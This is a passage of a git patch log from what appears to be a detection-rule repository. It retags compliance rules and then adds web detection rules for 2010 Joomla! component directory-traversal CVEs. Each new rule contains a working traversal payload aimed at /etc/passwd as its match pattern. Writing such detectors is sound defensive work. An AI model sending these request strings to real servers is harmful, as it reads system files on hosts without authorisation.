3.2 8.7 - - PCI DSS 3.2 8.8 - - PCI DSS 3.2 1.3 - - PCI DSS 3.2 1.4 - - PCI DSS 3.2 4.3 - - PCI DSS 3.2 7.1 - - PCI DSS 3.2 7.2 - - PCI DSS 3.2 7.3 +# tags: + # - CSC4 + # - CSC4.5 + # - CSC14 + # - CSC14.4 + # - CSC16 + # - CSC16.5 + # - NIST CSF 1.1 PR.AT-2 + # - NIST CSF 1.1 PR.MA-2 + # - NIST CSF 1.1 PR.PT-3 + # - NIST CSF 1.1 PR.AC-1 + # - NIST CSF 1.1 PR.AC-4 + # - NIST CSF 1.1 PR.AC-5 + # - NIST CSF 1.1 PR.AC-6 + # - NIST CSF 1.1 PR.AC-7 + # - NIST CSF 1.1 PR.DS-1 + # - NIST CSF 1.1 PR.DS-2 + # - ISO 27002-2013 A.9.2.1 + # - ISO 27002-2013 A.9.2.2 + # - ISO 27002-2013 A.9.2.3 + # - ISO 27002-2013 A.9.2.4 + # - ISO 27002-2013 A.9.2.5 + # - ISO 27002-2013 A.9.2.6 + # - ISO 27002-2013 A.9.3.1 + # - ISO 27002-2013 A.9.4.1 + # - ISO 27002-2013 A.9.4.2 + # - ISO 27002-2013 A.9.4.3 + # - ISO 27002-2013 A.9.4.4 + # - ISO 27002-2013 A.8.3.1 + # - ISO 27002-2013 A.9.1.1 + # - ISO 27002-2013 A.10.1.1 + # - PCI DSS 3.2 2.1 + # - PCI DSS 3.2 8.1 + # - PCI DSS 3.2 8.2 + # - PCI DSS 3.2 8.3 + # - PCI DSS 3.2 8.7 + # - PCI DSS 3.2 8.8 + # - PCI DSS 3.2 1.3 + # - PCI DSS 3.2 1.4 + # - PCI DSS 3.2 4.3 + # - PCI DSS 3.2 7.1 + # - PCI DSS 3.2 7.2 + # - PCI DSS 3.2 7.3 --- logsource: product: netflow diff --git a/rules/compliance/default_credentials_usage.yml b/rules/compliance/default_credentials_usage.yml index 297e16aa..fa9c67ce 100644 --- a/rules/compliance/default_credentials_usage.yml +++ b/rules/compliance/default_credentials_usage.yml @@ -81,29 +81,29 @@ detection: falsepositives: - unknown level: medium -tags: - - CSC4 - - CSC4.2 - - NIST CSF 1.1 PR.AC-4 - - NIST CSF 1.1 PR.AT-2 - - NIST CSF 1.1 PR.MA-2 - - NIST CSF 1.1 PR.PT-3 - - ISO 27002-2013 A.9.1.1 - - ISO 27002-2013 A.9.2.2 - - ISO 27002-2013 A.9.2.3 - - ISO 27002-2013 A.9.2.4 - - ISO 27002-2013 A.9.2.5 - - ISO 27002-2013 A.9.2.6 - - ISO 27002-2013 A.9.3.1 - - ISO 27002-2013 A.9.4.1 - - ISO 27002-2013 A.9.4.2 - - ISO 27002-2013 A.9.4.3 - - ISO 27002-2013 A.9.4.4 - - PCI DSS 3.2 2.1 - - PCI DSS 3.2 7.1 - - PCI DSS 3.2 7.2 - - PCI DSS 3.2 7.3 - - PCI DSS 3.2 8.1 - - PCI DSS 3.2 8.2 - - PCI DSS 3.2 8.3 - - PCI DSS 3.2 8.7 +# tags: + # - CSC4 + # - CSC4.2 + # - NIST CSF 1.1 PR.AC-4 + # - NIST CSF 1.1 PR.AT-2 + # - NIST CSF 1.1 PR.MA-2 + # - NIST CSF 1.1 PR.PT-3 + # - ISO 27002-2013 A.9.1.1 + # - ISO 27002-2013 A.9.2.2 + # - ISO 27002-2013 A.9.2.3 + # - ISO 27002-2013 A.9.2.4 + # - ISO 27002-2013 A.9.2.5 + # - ISO 27002-2013 A.9.2.6 + # - ISO 27002-2013 A.9.3.1 + # - ISO 27002-2013 A.9.4.1 + # - ISO 27002-2013 A.9.4.2 + # - ISO 27002-2013 A.9.4.3 + # - ISO 27002-2013 A.9.4.4 + # - PCI DSS 3.2 2.1 + # - PCI DSS 3.2 7.1 + # - PCI DSS 3.2 7.2 + # - PCI DSS 3.2 7.3 + # - PCI DSS 3.2 8.1 + # - PCI DSS 3.2 8.2 + # - PCI DSS 3.2 8.3 + # - PCI DSS 3.2 8.7 diff --git a/rules/compliance/group_modification_logging.yml b/rules/compliance/group_modification_logging.yml index 083cc2b6..0da15dea 100644 --- a/rules/compliance/group_modification_logging.yml +++ b/rules/compliance/group_modification_logging.yml @@ -33,29 +33,29 @@ detection: falsepositives: - unknown level: low -tags: - - CSC4 - - CSC4.8 - - NIST CSF 1.1 PR.AC-4 - - NIST CSF 1.1 PR.AT-2 - - NIST CSF 1.1 PR.MA-2 - - NIST CSF 1.1 PR.PT-3 - - ISO 27002-2013 A.9.1.1 - - ISO 27002-2013 A.9.2.2 - - ISO 27002-2013 A.9.2.3 - - ISO 27002-2013 A.9.2.4 - - ISO 27002-2013 A.9.2.5 - - ISO 27002-2013 A.9.2.6 - - ISO 27002-2013 A.9.3.1 - - ISO 27002-2013 A.9.4.1 - - ISO 27002-2013 A.9.4.2 - - ISO 27002-2013 A.9.4.3 - - ISO 27002-2013 A.9.4.4 - - PCI DSS 3.2 2.1 - - PCI DSS 3.2 7.1 - - PCI DSS 3.2 7.2 - - PCI DSS 3.2 7.3 - - PCI DSS 3.2 8.1 - - PCI DSS 3.2 8.2 - - PCI DSS 3.2 8.3 - - PCI DSS 3.2 8.7 +# tags: + # - CSC4 + # - CSC4.8 + # - NIST CSF 1.1 PR.AC-4 + # - NIST CSF 1.1 PR.AT-2 + # - NIST CSF 1.1 PR.MA-2 + # - NIST CSF 1.1 PR.PT-3 + # - ISO 27002-2013 A.9.1.1 + # - ISO 27002-2013 A.9.2.2 + # - ISO 27002-2013 A.9.2.3 + # - ISO 27002-2013 A.9.2.4 + # - ISO 27002-2013 A.9.2.5 + # - ISO 27002-2013 A.9.2.6 + # - ISO 27002-2013 A.9.3.1 + # - ISO 27002-2013 A.9.4.1 + # - ISO 27002-2013 A.9.4.2 + # - ISO 27002-2013 A.9.4.3 + # - ISO 27002-2013 A.9.4.4 + # - PCI DSS 3.2 2.1 + # - PCI DSS 3.2 7.1 + # - PCI DSS 3.2 7.2 + # - PCI DSS 3.2 7.3 + # - PCI DSS 3.2 8.1 + # - PCI DSS 3.2 8.2 + # - PCI DSS 3.2 8.3 + # - PCI DSS 3.2 8.7 diff --git a/rules/compliance/host_without_firewall.yml b/rules/compliance/host_without_firewall.yml index cab122e0..ae9a76a7 100644 --- a/rules/compliance/host_without_firewall.yml +++ b/rules/compliance/host_without_firewall.yml @@ -17,15 +17,15 @@ detection: host.scan.vuln_name: Firewall Product Not Detected* condition: selection level: low -tags: - - CSC9 - - CSC9.4 - - NIST CSF 1.1 PR.AC-5 - - NIST CSF 1.1 PR.AC-6 - - NIST CSF 1.1 PR.AC-7 - - NIST CSF 1.1 DE.AE-1 - - ISO 27002-2013 A.9.1.2 - - ISO 27002-2013 A.13.2.1 - - ISO 27002-2013 A.13.2.2 - - ISO 27002-2013 A.14.1.2 - - PCI DSS 3.2 1.4 +# tags: + # - CSC9 + # - CSC9.4 + # - NIST CSF 1.1 PR.AC-5 + # - NIST CSF 1.1 PR.AC-6 + # - NIST CSF 1.1 PR.AC-7 + # - NIST CSF 1.1 DE.AE-1 + # - ISO 27002-2013 A.9.1.2 + # - ISO 27002-2013 A.13.2.1 + # - ISO 27002-2013 A.13.2.2 + # - ISO 27002-2013 A.14.1.2 + # - PCI DSS 3.2 1.4 diff --git a/rules/compliance/workstation_was_locked.yml b/rules/compliance/workstation_was_locked.yml index 37fd37c9..0cb5033c 100644 --- a/rules/compliance/workstation_was_locked.yml +++ b/rules/compliance/workstation_was_locked.yml @@ -21,27 +21,27 @@ detection: falsepositives: - unknown level: low -tags: - - CSC16 - - CSC16.11 - - ISO27002-2013 A.9.1.1 - - ISO27002-2013 A.9.2.1 - - ISO27002-2013 A.9.2.2 - - ISO27002-2013 A.9.2.3 - - ISO27002-2013 A.9.2.4 - - ISO27002-2013 A.9.2.5 - - ISO27002-2013 A.9.2.6 - - ISO27002-2013 A.9.3.1 - - ISO27002-2013 A.9.4.1 - - ISO27002-2013 A.9.4.3 - - ISO27002-2013 A.11.2.8 - - PCI DSS 3.1 7.1 - - PCI DSS 3.1 7.2 - - PCI DSS 3.1 7.3 - - PCI DSS 3.1 8.7 - - PCI DSS 3.1 8.8 - - NIST CSF 1.1 PR.AC-1 - - NIST CSF 1.1 PR.AC-4 - - NIST CSF 1.1 PR.AC-6 - - NIST CSF 1.1 PR.AC-7 - - NIST CSF 1.1 PR.PT-3 +# tags: + # - CSC16 + # - CSC16.11 + # - ISO27002-2013 A.9.1.1 + # - ISO27002-2013 A.9.2.1 + # - ISO27002-2013 A.9.2.2 + # - ISO27002-2013 A.9.2.3 + # - ISO27002-2013 A.9.2.4 + # - ISO27002-2013 A.9.2.5 + # - ISO27002-2013 A.9.2.6 + # - ISO27002-2013 A.9.3.1 + # - ISO27002-2013 A.9.4.1 + # - ISO27002-2013 A.9.4.3 + # - ISO27002-2013 A.11.2.8 + # - PCI DSS 3.1 7.1 + # - PCI DSS 3.1 7.2 + # - PCI DSS 3.1 7.3 + # - PCI DSS 3.1 8.7 + # - PCI DSS 3.1 8.8 + # - NIST CSF 1.1 PR.AC-1 + # - NIST CSF 1.1 PR.AC-4 + # - NIST CSF 1.1 PR.AC-6 + # - NIST CSF 1.1 PR.AC-7 + # - NIST CSF 1.1 PR.PT-3 diff --git a/rules/windows/process_creation/win_apt_unc2452_cmds.yml b/rules/windows/process_creation/win_apt_unc2452_cmds.yml index b1c08180..be14932e 100644 --- a/rules/windows/process_creation/win_apt_unc2452_cmds.yml +++ b/rules/windows/process_creation/win_apt_unc2452_cmds.yml @@ -7,8 +7,8 @@ references: tags: - attack.execution - attack.t1059.001 - - sunburst - - unc2452 + # - sunburst + # - unc2452 author: Florian Roth date: 2021/01/22 modified: 2021/06/27 diff --git a/rules/windows/process_creation/win_apt_unc2452_ps.yml b/rules/windows/process_creation/win_apt_unc2452_ps.yml index 89de914d..5575f09f 100644 --- a/rules/windows/process_creation/win_apt_unc2452_ps.yml +++ b/rules/windows/process_creation/win_apt_unc2452_ps.yml @@ -9,7 +9,7 @@ tags: - attack.execution - attack.t1059.001 - attack.t1047 - - sunburst + # - sunburst author: Florian Roth date: 2021/01/20 modified: 2021/01/22 diff --git a/rules/windows/process_creation/win_susp_servu_exploitation_cve_2021_35211.yml b/rules/windows/process_creation/win_susp_servu_exploitation_cve_2021_35211.yml index f6208a36..4056fcdb 100644 --- a/rules/windows/process_creation/win_susp_servu_exploitation_cve_2021_35211.yml +++ b/rules/windows/process_creation/win_susp_servu_exploitation_cve_2021_35211.yml @@ -13,7 +13,7 @@ logsource: tags: - attack.persistence - attack.t1136.001 - - threat_group.DEV-0322 + # - threat_group.DEV-0322 detection: selection1: CommandLine|contains: 'whoami' diff --git a/rules/windows/registry_event/sysmon_susp_reg_persist_explorer_run.yml b/rules/windows/registry_event/sysmon_susp_reg_persist_explorer_run.yml index 2c6ae5ca..b1ce684a 100755 --- a/rules/windows/registry_event/sysmon_susp_reg_persist_explorer_run.yml +++ b/rules/windows/registry_event/sysmon_susp_reg_persist_explorer_run.yml @@ -28,7 +28,7 @@ tags: - attack.persistence - attack.t1060 # an old one - attack.t1547.001 - - capec.270 + # - capec.270 fields: - Image - ParentImage diff --git a/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml b/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml index d0117429..eea60e94 100644 --- a/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml +++ b/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml @@ -15,7 +15,7 @@ tags: - attack.credential_access - attack.t1566 - attack.t1203 - - threat_group.Sourgum + # - threat_group.Sourgum falsepositives: - Unlikely level: critical diff --git a/tests/test_rules.py b/tests/test_rules.py index f712875f..4c01de39 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -79,17 +79,17 @@ class TestRules(unittest.TestCase): for file in self.yield_next_rule_file_path(self.path_to_rules): tags = self.get_rule_part(file_path=file, part_name="tags") if tags: - for tag in tags: - if tag.startswith("attack."): - continue - elif tag.startswith("car."): - continue - elif tag.startswith("cve."): - print(Fore.RED + "Rule {} has the cve tag <{}> but is it a references (https://nvd.nist.gov/)".format(file, tag)) - files_with_incorrect_tags.append(file) - else: - print(Fore.RED + "Rule {} has the unknown tag <{}>".format(file, tag)) - # files_with_incorrect_tags.append(file) + for tag in tags: + if tag.startswith("attack."): + continue + elif tag.startswith("car."): + continue + elif tag.startswith("cve."): + print(Fore.RED + "Rule {} has the cve tag <{}> but is it a references (https://nvd.nist.gov/)".format(file, tag)) + files_with_incorrect_tags.append(file) + else: + print(Fore.RED + "Rule {} has the unknown tag <{}>".format(file, tag)) + files_with_incorrect_tags.append(file) self.assertEqual(files_with_incorrect_tags, [], Fore.RED + "There are rules with incorrect/unknown MITRE Tags. (please inform us about new tags that are not yet supported in our tests) and check the correct tags here: https://attack.mitre.org/ ") From 6019871a7873f0cb03ee3f23ce6ee06d3b32987a Mon Sep 17 00:00:00 2001 From: pbssubhash Date: Wed, 25 Aug 2021 20:14:36 +0530 Subject: [PATCH 0576/1367] Adding Rules - Web 2010 --- rules/web/web_cve_CVE-2010-0943.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-0944.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1314.yaml | 23 +++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1345.yaml | 23 +++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1353.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1474.yaml | 26 ++++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1475.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1495.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1532.yaml | 24 ++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1533.yaml | 23 +++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1535.yaml | 24 ++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1602.yaml | 26 ++++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1657.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1718.yaml | 24 ++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1722.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1875.yaml | 26 ++++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1953.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1955.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1979.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-1983.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-2033.yaml | 26 ++++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-2036.yaml | 26 ++++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-2259.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-2307.yaml | 27 +++++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-2682.yaml | 26 ++++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-2861.yaml | 27 +++++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-3426.yaml | 23 +++++++++++++++++++++++ rules/web/web_cve_CVE-2010-4231.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-4617.yaml | 25 +++++++++++++++++++++++++ rules/web/web_cve_CVE-2010-5278.yaml | 26 ++++++++++++++++++++++++++ 30 files changed, 750 insertions(+) create mode 100644 rules/web/web_cve_CVE-2010-0943.yaml create mode 100644 rules/web/web_cve_CVE-2010-0944.yaml create mode 100644 rules/web/web_cve_CVE-2010-1314.yaml create mode 100644 rules/web/web_cve_CVE-2010-1345.yaml create mode 100644 rules/web/web_cve_CVE-2010-1353.yaml create mode 100644 rules/web/web_cve_CVE-2010-1474.yaml create mode 100644 rules/web/web_cve_CVE-2010-1475.yaml create mode 100644 rules/web/web_cve_CVE-2010-1495.yaml create mode 100644 rules/web/web_cve_CVE-2010-1532.yaml create mode 100644 rules/web/web_cve_CVE-2010-1533.yaml create mode 100644 rules/web/web_cve_CVE-2010-1535.yaml create mode 100644 rules/web/web_cve_CVE-2010-1602.yaml create mode 100644 rules/web/web_cve_CVE-2010-1657.yaml create mode 100644 rules/web/web_cve_CVE-2010-1718.yaml create mode 100644 rules/web/web_cve_CVE-2010-1722.yaml create mode 100644 rules/web/web_cve_CVE-2010-1875.yaml create mode 100644 rules/web/web_cve_CVE-2010-1953.yaml create mode 100644 rules/web/web_cve_CVE-2010-1955.yaml create mode 100644 rules/web/web_cve_CVE-2010-1979.yaml create mode 100644 rules/web/web_cve_CVE-2010-1983.yaml create mode 100644 rules/web/web_cve_CVE-2010-2033.yaml create mode 100644 rules/web/web_cve_CVE-2010-2036.yaml create mode 100644 rules/web/web_cve_CVE-2010-2259.yaml create mode 100644 rules/web/web_cve_CVE-2010-2307.yaml create mode 100644 rules/web/web_cve_CVE-2010-2682.yaml create mode 100644 rules/web/web_cve_CVE-2010-2861.yaml create mode 100644 rules/web/web_cve_CVE-2010-3426.yaml create mode 100644 rules/web/web_cve_CVE-2010-4231.yaml create mode 100644 rules/web/web_cve_CVE-2010-4617.yaml create mode 100644 rules/web/web_cve_CVE-2010-5278.yaml diff --git a/rules/web/web_cve_CVE-2010-0943.yaml b/rules/web/web_cve_CVE-2010-0943.yaml new file mode 100644 index 00000000..e90c6aab --- /dev/null +++ b/rules/web/web_cve_CVE-2010-0943.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-0943:Joomla! Component com_jashowcase - Directory Traversal +id: a7b7151c-99e5-444b-89db-df927d1055ed +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) + component for Joomla! allows remote attackers to read arbitrary files via a .. (dot + dot) in the controller parameter in a jashowcase action to index.php. +references: +- https://www.exploit-db.com/exploits/11090 +- https://www.cvedetails.com/cve/CVE-2010-0943 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-0944.yaml b/rules/web/web_cve_CVE-2010-0944.yaml new file mode 100644 index 00000000..22499499 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-0944.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-0944:Joomla! Component com_jcollection - Directory Traversal +id: c3a5750d-210b-4a15-b1f7-17444d634a6a +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the JCollection (com_jcollection) + component for Joomla! allows remote attackers to read arbitrary files via a .. (dot + dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/11088 +- https://www.cvedetails.com/cve/CVE-2010-0944 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1314.yaml b/rules/web/web_cve_CVE-2010-1314.yaml new file mode 100644 index 00000000..324e4a66 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1314.yaml @@ -0,0 +1,23 @@ +title: CVE-2010-1314:Joomla! Component Highslide 1.5 - Local File Inclusion +id: 226602ff-06ce-4173-9b87-7c2d62b4b3a4 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) + component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files + via a .. (dot dot) in the controller parameter to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1345.yaml b/rules/web/web_cve_CVE-2010-1345.yaml new file mode 100644 index 00000000..187b3f3c --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1345.yaml @@ -0,0 +1,23 @@ +title: CVE-2010-1345:Joomla! Component Cookex Agency CKForms - Local File Inclusion +id: ff1015cf-e991-458c-a999-67e30fd34f9a +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) + component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via + a .. (dot dot) in the controller parameter to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1353.yaml b/rules/web/web_cve_CVE-2010-1353.yaml new file mode 100644 index 00000000..77a9f02b --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1353.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-1353:Joomla! Component LoginBox - Local File Inclusion +id: dee9b22f-1e7c-44ec-ad34-555ea35c0a6e +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) + component for Joomla! allows remote attackers to read arbitrary files via a .. (dot + dot) in the view parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12068 +- https://www.cvedetails.com/cve/CVE-2010-1353 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1474.yaml b/rules/web/web_cve_CVE-2010-1474.yaml new file mode 100644 index 00000000..f0c21085 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1474.yaml @@ -0,0 +1,26 @@ +title: CVE-2010-1474:Joomla! Component Sweetykeeper 1.5 - Local File Inclusion +id: b2a1a114-6d92-4cce-8b53-b82518abf56c +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) + component 1.5.x for Joomla! allows remote attackers to read arbitrary files and + possibly have unspecified other impact via a .. (dot dot) in the controller parameter + to index.php. +references: +- https://www.exploit-db.com/exploits/12182 +- https://www.cvedetails.com/cve/CVE-2010-1474 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1475.yaml b/rules/web/web_cve_CVE-2010-1475.yaml new file mode 100644 index 00000000..b4e9e4f1 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1475.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-1475:Joomla! Component Preventive And Reservation 1.0.5 - Local File + Inclusion +id: 6d1e0e6f-4e68-4f1c-8f60-467521d0c25b +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) + component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and + possibly have unspecified other impact via a .. (dot dot) in the controller parameter + to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1495.yaml b/rules/web/web_cve_CVE-2010-1495.yaml new file mode 100644 index 00000000..a3b4cdc1 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1495.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-1495:Joomla! Component Matamko 1.01 - Local File Inclusion +id: 6edfc22e-9b33-43c4-8872-eb41d6cfb5bd +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Matamko (com_matamko) component + 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) + in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12286 +- https://www.cvedetails.com/cve/CVE-2010-1495 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1532.yaml b/rules/web/web_cve_CVE-2010-1532.yaml new file mode 100644 index 00000000..b3df21b9 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1532.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1532:Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion +id: d1890f8a-ef82-4d0c-a686-bace99bd54f2 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) + component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and + possibly have unspecified other impact via a .. (dot dot) in the controller parameter + to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1533.yaml b/rules/web/web_cve_CVE-2010-1533.yaml new file mode 100644 index 00000000..53b10518 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1533.yaml @@ -0,0 +1,23 @@ +title: CVE-2010-1533:Joomla! Component TweetLA 1.0.1 - Local File Inclusion +id: 432ecccc-dfd6-4c0f-8173-0f57f8eafe46 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the TweetLA (com_tweetla) component + 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot + dot) in the controller parameter to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1535.yaml b/rules/web/web_cve_CVE-2010-1535.yaml new file mode 100644 index 00000000..f5d20bce --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1535.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1535:Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion +id: 36a64564-5ba1-40ff-a85f-6a0a11215c35 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the TRAVELbook (com_travelbook) + component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and + possibly have unspecified other impact via a .. (dot dot) in the controller parameter + to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1602.yaml b/rules/web/web_cve_CVE-2010-1602.yaml new file mode 100644 index 00000000..e57fe8fe --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1602.yaml @@ -0,0 +1,26 @@ +title: CVE-2010-1602:Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion +id: e9519f69-b3b8-4695-88bb-5bf2d34e40aa +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) + component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and + possibly have unspecified other impact via a .. (dot dot) in the controller parameter + to index.php. +references: +- https://www.exploit-db.com/exploits/12283 +- https://www.cvedetails.com/cve/CVE-2010-1602 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1657.yaml b/rules/web/web_cve_CVE-2010-1657.yaml new file mode 100644 index 00000000..614266e8 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1657.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-1657:Joomla! Component SmartSite 1.0.0 - Local File Inclusion +id: b32928f2-521b-4e3b-b34c-cb49617727ca +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the 